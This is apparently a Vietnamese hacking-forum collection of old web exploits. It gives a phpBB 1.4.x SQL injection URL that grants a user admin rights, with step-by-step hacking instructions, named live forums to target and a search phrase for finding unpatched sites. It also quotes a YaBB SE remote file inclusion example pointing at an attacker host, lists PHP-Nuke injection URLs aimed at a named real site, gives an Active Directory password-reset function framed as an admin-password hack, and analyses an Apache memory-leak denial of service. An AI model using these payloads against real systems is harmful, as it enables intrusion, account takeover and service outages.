Lỗi trong phpBB 1.4.x có phép đoạt quyền Admin

Các forum phpBB 1.4.x có một lỗi rất nghiêm trọng cho phép một user bình thường có thể chạy đoạn lệnh cho phép cập nhật vài thông tin trong preferences để có được quyền admin.
Một trong số lỗi được tìm thấy trong đoạn code sau:

< Example sql query in prefs.php >
$sql = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes', user_attachsig = '$sig',
user_desmile = '$smile', user_html = '$dishtml',
user_bbcode
= '$disbbcode', user_lang = '$lang' WHERE
(user_id = '$userdata[user_id]'";
</ End example code >

Để khai thác, ta chạy lệnh modify prefereces trong file prefx.php, bằng cách xác định một giá trị cụ thể cho biến viewemail.
Vd sau sẽ đặt cho một username maxx có quyền admin (privilege level 4): http://k.domaindlx.com/clairsang/sitename/phpbbfolder/prefs.php@save=1&viewemail=1',user_level_253d'4'%20where%20username_253d'maxx'_2523
Lệnh này sẽ chạy lệnh sql cập nhật thông tin về viewemail đồng thời cả user_level.

Như vậy, các bước cần thiết để thử test hack một forum dạng này như sau:
- Đăng kí 1 acc
- Login vào với acc vừa đăng kí
- Chạy link ở vd trên
- Nếu thiết lập preferences thành công (ko báo lỗi), bạn return lại forum index và vào Administration Panel ở cuối forum.
Lưu ý có một vài forum sau khi set preferences thành công, vẫn ko thấy Administration Panel, bạn có thể thử vào theo link sau: /phpBBfolder/admin/index.php (như forum pregnancy.org ở dưới)

Một vài forum thử nghiệm: http://k.domaindlx.com/clairsang/tuxedox2.dyndns.org/phpbb/index.php http://k.domaindlx.com/clairsang/www.pregnancy.org/phpbb/index.php http://k.domaindlx.com/clairsang/webraovat.com/phpbb/default.htm

Các bạn có thể tìm thêm các forum phpBB 1.4.x chưa fix trên net, search theo từ khóa ví dụ như: "powered phpbb 1.4.0"

Lỗi bảo mật trong Yabb, cho phép truy cập trái phép từ xa

YaBB là một free software forum được dùng khá phổ biến hiện nay. Lỗi được tìm thấy trong Version 1.50 trở về trước. Trong yabb forum phần thư mục source có một file Packages.php trong những dòng đầu của file này có thể cho phép tin tặc truy cập trái phép từ xa và dùng các lệnh nguy hiểm .
xin tham khảo thông tin đầy đủ dưới đây:

All versions prior to 1.5.0
----------------------
Vulnerability:
----------------------
YabbSE keeps all of it's function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Bellow are a couple of the first lines in Packages.php:

********
..

global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";

$safe_mode = ini_get("safe_mode");

$pacmanver = "1.4.1";

include_once("$sourcedir/Packer.php");

..

********

We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.
Example:

http://victim/yabbse/Sources/Packages.php?...ttp://attacker/

where the attacker server has a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.

Side-note: An attacker may also use this file for XSS attack on the server.

----------------------
Solution:
----------------------

Please check the vendor's website for new patches.

As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.

----------------------
Greetz:
----------------------

Hawkje, Truckle, Cyon, daemorhedron, Mithrandir

<------- ------->

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=a...affiliate&l=427           

Hack Php-Nuke, lỗi SQL injection, Versions: 6.x (kể cả 6.5) y 5.x

Thông tin:
+ Type: SQL injection.
+ Software: PHP-Nuke
+ Versions: 6.x (kể cả 6.5) y 5.x
+ Exploit: Yes

Giới thiệu:
 PhpNuke là một hệ thống quản lý nổi tiếng được lập trình bằng ngôn ngữ PHP bởi Francisco Bucci.

Mô tả:
Module Web_Links ở trên PHP-Nuke có nhiều lỗi SQL injection (hơn 20). User có thể chèn mã SQL vào hấu hết các gí trị thuộc số mà được include trong query, do người viết mã không dùng dấu ngoặc kép.
Khai thác:
Nếu tác nhân SQL cho phép ta dùng một câu UNION (như MySQL 4) nó có thể lấy thông tin ra từ bên trong bất kỳ cơ sở dữ liệu nào, tất nhiên là bao gồm cả password, dữ liệu cá nhân, etc. Mặt khác, nếu không có UNION ta không thể truy cập vào những table khác của SQL do web links quản lý, vì vậy chỉ có cách là chơi với hit và vote.
Ví dụ:
Ở hàm viewlink:

$result = sql_query("select title,parentid from
".$prefix."_links_categories where cid=$cid", $dbi);

+http://victim/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<code của bạn>
Thêm vài lỗi SQL injection
Ví dụ:

Ở hàm getit

sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE lid=$lid", $dbi);
       $result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads
WHERE lid=$lid", $dbi);

+http://www.caxa.ru/modules.php?name=Downloads&d_op=getit&lid=2%20<our_code>

Ở hàm search

$result = sql_query("SELECT lid, cid, title, url, description, date, hits,
downloadratingsummary, totalvotes, totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads WHERE title LIKE '%$query%' OR
description LIKE '%$query%' ORDER BY $orderby LIMIT $min,$downloadsresults", $dbi);

+http://www.caxa.ru/modules.php?name=Downloads&d_op=search&min=2%20<our_code>
           

Đổi passAdmin bằng VB

Các bạn thử nghiên cứu và hoàn thiện Function này nhé !

Public Function ChangePassword(UserName As String, NewPassword As String) As Boolean

'EXAMPLE: ChangePassword "Administrator", "adminpassword"

Dim conn As New ADODB.Connection
Dim rs As ADODB.Recordset
Dim oRoot As IADs
Dim oDomain As IADs
Dim sBase As String
Dim sFilter As String
Dim sDomain As String

Dim sAttribs As String
Dim sDepth As String
Dim sQuery As String

Dim user As IADsUser

On Error GoTo errhandler:

Set oRoot = GetObject("LDAP://rootDSE")
'work in the default domain
sDomain = oRoot.Get("defaultNamingContext")
Set oDomain = GetObject("LDAP://" & sDomain)
sBase = "<" & oDomain.ADsPath & ">"
'Only get user name requested
sFilter = "(&(objectCategory=person)(objectClass=user)(name=" _
& UserName & "))"
sAttribs = "adsPath"
sDepth = "subTree"

sQuery = sBase & ";" & sFilter & ";" & sAttribs & ";" & sDepth

conn.Open _
"Data Source=Active Directory Provider;Provider=ADsDSOObject"

Set rs = conn.Execute(sQuery)

With rs
If Not .EOF Then
Set user = GetObject(rs("adsPath"))
user.SetPassword NewPassword
ChangePassword = True
End If
End With

errhandler:

On Error Resume Next
If Not rs Is Nothing Then
If rs.State <> 0 Then rs.Close
Set rs = Nothing
End If

If Not conn Is Nothing Then
If conn.State <> 0 Then conn.Close
Set conn = Nothing
End If

Set oRoot = Nothing
Set oDomain = Nothing

End Function  

Exploit Code Released for Apache 2.x Memory Leak

>II. DESCRIPTION
>
>Remote exploitation of a memory leak in the Apache HTTP Server causes the
>daemon to over utilize system resources on an affected system. The problem
>is HTTP Server's handling of large chunks of consecutive linefeed
>characters. The web server allocates an eighty-byte buffer for each
>linefeed character without specifying an upper limit for allocation.
>Consequently, an attacker can remotely exhaust system resources by
>generating many requests containing these characters.


This is partially correct. Rather than "many requests containing these characters", the more effective strategy is "many instances of this character (these characters)".

>III. ANALYSIS
>
>While this type of attack is most effective in an intranet setting, remote
>exploitation over the Internet, while bandwidth intensive, is feasible.
>Remote exploitation could consume system resources on a targeted system
>and, in turn, render the Apache HTTP daemon unavailable.


Isn't that the truth? In a few minutes, my Apache used some 390 MB of memory when tested. The statement that only 80 bytes is lost per newline understates the issue in my opinion. If we multiply:


2 newlines: 160 bytes
4 newlines: 320 bytes
8 newlines: 640 bytes
16 newlines: 1280 bytes
32 newlines: 2560 bytes
64 newlines: 5120 bytes
128 newlines: 10240 bytes
256 newlines: 20480 bytes
512 newlines: 40960 bytes
1024 newlines: 81920 bytes


Worse, Apache doesn't require any form to the request what-so-ever, so 1 KB of 0x0A's is just as good as a well-formed request. Let's continue:


2 KB: 163840 bytes
4 KB: 655360 bytes
8 KB: 1310720 bytes
16 KB: 2621440 bytes


That's nearly 2 MB leaked in response to 16 KB. And, this is just baseline figures of the actual leak itself, and doesn't take into account various other factors, including:


* Other use of memory by Apache
* The resources associated with the web session


>iDEFENSE has performed research using proof of concept exploit code to
>demonstrate the impact of this vulnerability.


I'm not seeing any example code, so let's try the attached.
"apache-massacre.c" allows the user to target a host/port of choice. It uses a single-connection method, and is stopped with a simple CTRL+C interrupt.


It sends the data (which is patterns of "\r\n") in "chunks". It sends a pre-specified number of character sequences, and then checks the interrupt flag for a request to terminate. Deployed on a high-bandwidth connection (or a low-bandwidth connection with a lot of time to spare), Apache is
disabled within seconds.


The attached code compiles cleanly on Win32, and *should* compile on any system that is POSIX-compliant, and offers a BSD socket interface.


>A successful exploitation scenario requires between two and
>seven megabytes of traffic exchange.


I hate to say, but I wonder where these figures come from. Obviously, a machine with a 16 MB RAM and a 512 MB hard drive is going to run out of resources incredibly faster than a machine with 512 MB RAM and a 100 GB hard drive is. Also, "between two and seven megabytes of traffic exchange" is very possible with a DDoSnet of some kind. With 10 connections at 1 mbps each (for a combined speed of 10 mbps), approximately 1,750,000 bytes (1.25 MB) is exchanged each second. This same speed is reached by the full upload rates of many LAN-based providers (schools, for instance). Further, a single cable modem has a link rate of 10 mbps, held down only by ISP capping.


In the situation of such a network (or, a single uncapped cable modem), the entire traffic exchange rate is hit within one second.